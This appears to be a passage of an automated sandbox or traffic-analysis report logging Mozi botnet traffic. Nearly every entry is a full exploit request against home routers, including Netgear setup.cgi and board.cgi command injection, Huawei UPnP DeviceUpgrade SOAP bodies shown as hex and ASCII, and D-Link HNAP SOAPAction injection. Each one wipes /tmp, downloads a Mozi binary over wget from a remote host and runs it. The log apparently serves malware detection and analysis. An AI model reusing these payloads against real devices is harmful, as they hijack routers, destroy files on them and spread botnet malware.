                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 216.243.102.141:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 202.218.205.135:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 35.73.130.33:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 128.27.58.131:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 137.11.27.138:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 12.57.50.133:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 94.45.13.4:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 174.243.22.77:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
